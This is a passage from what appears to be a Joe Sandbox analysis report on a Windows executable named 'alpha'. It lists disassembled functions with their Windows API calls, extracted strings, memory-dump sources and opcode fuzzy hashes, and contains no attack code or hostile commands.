                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                        • String ID: KEYS$LIST$OFF
                                        • API String ID: 411561164-4129271751
                                        • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                        • Instruction ID: 28cd1575d557dd362f7db2d9c961e1dcfadb03c1ce529aa67a9ce272c1ce7969
                                        • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                        • Instruction Fuzzy Hash: 35215E20B0CA02A1FA54BF65E855175F6A1EB947B0FC49231DF3E462E5FE3CDA448720
                                        Function 00007FF7CD4901B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD490212
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD490228
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD49023C
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD490251
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                        • String ID:
                                        • API String ID: 513048808-0
                                        • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                        • Instruction ID: 637f4558c1c8ad42cdff2ac884067e5df75f71654895f4870d3b973f0e642509
                                        • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                        • Instruction Fuzzy Hash: 2121A321B0CA8287E6506FA2A588638FB95FF59776F944134DF2E022D4EF7DA6448720
                                        Function 00007FF7CD499584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 4104442557-0
                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                        • Instruction ID: 476fa3a789f3fba084f56d0ca9abc6fe02ec12804918e63dfb27762a1a9ff754
                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                        • Instruction Fuzzy Hash: A5113021708F419AEB00EFA5E84816873A4F719768F801A34EF6D46754EF3CD6648350
                                        Function 00007FF7CD493578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                        • String ID:
                                        • API String ID: 513048808-0
                                        • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                        • Instruction ID: a0e83ec708f9df779452c4f97edfa252efdc57763845094127647c313676558b
                                        • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                        • Instruction Fuzzy Hash: 30118421B0CA4296E6506FA6A458438FA96FB5A774F985330DF3E423D0EE3CEA448710
                                        Function 00007FF7CD4A711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4A71F9
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4A720D
                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4A7300
                                          • Part of subcall function 00007FF7CD4A5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7CD4A75C4,?,?,00000000,00007FF7CD4A6999,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A5744
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: OpenSemaphore$CloseErrorHandleLast
                                        • String ID: _p0$wil
                                        • API String ID: 455305043-1814513734
                                        • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                        • Instruction ID: c728b3d51ad5766a7581a9ca2f2f2628d80d4582c1f80afcadaa38c0271c88fa
                                        • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                        • Instruction Fuzzy Hash: 4D61A162B1DA8286EF25FF5594102B9A3A5EF84BA0FD54531DF1E07795FE3CE6008320
                                        Function 00007FF7CD481DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapiswspacememset$AllocProcess
                                        • String ID: %s
                                        • API String ID: 2401724867-3043279178
                                        • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                        • Instruction ID: 74ba04c0094f2bfe9baa8841812e742bb3bb1e73901e2c647187340274648a04
                                        • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                        • Instruction Fuzzy Hash: DB51A132B0D68285EB61AF12D8546B9B3A1EB49BA4F844035DF6D47694FF3CE641C720
                                        Function 00007FF7CD48E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 3849470556-1994581435
                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                        • Instruction ID: 72e36a48bb84eaddc38185d121e35f763a2659c3a4269981e8cbe25e57be3e05
                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                        • Instruction Fuzzy Hash: 58517C31B0C64285EB64AF56E848579B7A0BB54BA4F848435DF6D87390FF7EEA40C720
                                        Function 00007FF7CD4A992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4A9A10
                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4A9994
                                          • Part of subcall function 00007FF7CD4AA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA77A
                                          • Part of subcall function 00007FF7CD4AA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA839
                                          • Part of subcall function 00007FF7CD4AA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA850
                                        • wcsrchr.MSVCRT ref: 00007FF7CD4A9A62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                        • String ID: %s=%s$.
                                        • API String ID: 3242694432-4275322459
                                        • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                        • Instruction ID: 91f21546d2597e50aaf9c33c4106e379e665dd53cd2867a292b791b0bcf4b57c
                                        • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                        • Instruction Fuzzy Hash: 4E417D21B0D68296EA14BF51A4542BAE291AF857B0FC44231DF7D477D5FF7CEA418320
                                        Function 00007FF7CD4A54B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD4A54E6
                                        • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4A552E
                                          • Part of subcall function 00007FF7CD4A758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7CD4A6999,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A75AE
                                          • Part of subcall function 00007FF7CD4A758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7CD4A6999,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A75C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateCurrentMutexProcess
                                        • String ID: Local\SM0:%d:%d:%hs$wil$x
                                        • API String ID: 779401067-630742106
                                        • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                        • Instruction ID: 82185c5936d0e782cc1af25605cbc45bf49c7c895eefb2f4400a55c009980537
                                        • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                        • Instruction Fuzzy Hash: 71519332B1CA8292EB21AF55E4007FAE361EF947A4FC44031EF1D4BA59EE3CD6058720
                                        Function 00007FF7CD49417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CurrentDirectorytowupper
                                        • String ID: :$:
                                        • API String ID: 238703822-3780739392
                                        • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                        • Instruction ID: 838f5065fb88b935fec654f5c6ea24d0b170ae65f920849ec992666ccb7eec7e
                                        • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                        • Instruction Fuzzy Hash: 3811561270C60085EB25AFA2E409639F6A1EF597A9F858136DF4D07354EF3CD2018718
                                        Function 00007FF7CD4858D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                        • API String ID: 3677997916-3870813718
                                        • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                        • Instruction ID: 40ebd625bab0ba1d11caa7e2f9b604cd8f79bd9dc65a776082075eddacdf5be4
                                        • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                        • Instruction Fuzzy Hash: 7511283261CA4196EB109F50E44426AFBA0FB997A4F804225DF9D42B68EF7CD248CB10
                                        Function 00007FF7CD484C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memsetwcsrchr$wcschr
                                        • String ID:
                                        • API String ID: 110935159-0
                                        • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                        • Instruction ID: 4d8171d0407ed6b40246024e38603cc7819f5439e893006041674a727162b072
                                        • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                        • Instruction Fuzzy Hash: 4751B322B0D68285FA21AF5198447F9E396BB58BF4F844235CF6E4B784EE3CE6418310
                                        Function 00007FF7CD495EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$CurrentDirectorytowupper
                                        • String ID:
                                        • API String ID: 1403193329-0
                                        • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                        • Instruction ID: 0fcfa3307ff4dbbda2110518a452ff0ce924fee45b8b523715cccf9ba5964ff0
                                        • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                        • Instruction Fuzzy Hash: B551C126B0D68185EB24EF22D844AB9B7A6EF49778F858035CF2D07694FF3CD6448720
                                        Function 00007FF7CD4891C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00007FF7CD48921C
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD4893AA
                                          • Part of subcall function 00007FF7CD488B20: wcsrchr.MSVCRT ref: 00007FF7CD488BAB
                                          • Part of subcall function 00007FF7CD488B20: _wcsicmp.MSVCRT ref: 00007FF7CD488BD4
                                          • Part of subcall function 00007FF7CD488B20: _wcsicmp.MSVCRT ref: 00007FF7CD488BF2
                                          • Part of subcall function 00007FF7CD488B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD488C16
                                          • Part of subcall function 00007FF7CD488B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD488C2F
                                          • Part of subcall function 00007FF7CD488B20: wcschr.MSVCRT ref: 00007FF7CD488CB3
                                          • Part of subcall function 00007FF7CD49417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD4941AD
                                          • Part of subcall function 00007FF7CD493060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7CD4892AC), ref: 00007FF7CD4930CA
                                          • Part of subcall function 00007FF7CD493060: SetErrorMode.KERNELBASE ref: 00007FF7CD4930DD
                                          • Part of subcall function 00007FF7CD493060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4930F6
                                          • Part of subcall function 00007FF7CD493060: SetErrorMode.KERNELBASE ref: 00007FF7CD493106
                                        • wcsrchr.MSVCRT ref: 00007FF7CD4892D8
